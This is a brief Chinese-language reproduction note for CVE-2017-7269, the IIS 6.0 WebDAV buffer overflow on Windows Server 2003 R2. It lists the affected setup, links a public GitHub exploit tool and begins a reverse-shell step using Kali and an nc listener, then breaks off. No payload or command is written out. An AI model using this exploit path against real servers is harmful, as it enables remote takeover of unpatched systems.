简介
Microsoft windows Server 2003 R2中的 Interne信息服务IIS6.0中的 WebDAV服务中的 ScStoragePathFromUrl函数中的缓冲区溢出允许远程攻击者通过以 If
影响范围
WiNdows Server 2003 R2 上使⽤IIS6.0并开启 WebDAV扩展。
复现过程
利⽤⼯具:https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269
反弹shell
kali下载⼯具,nc监听: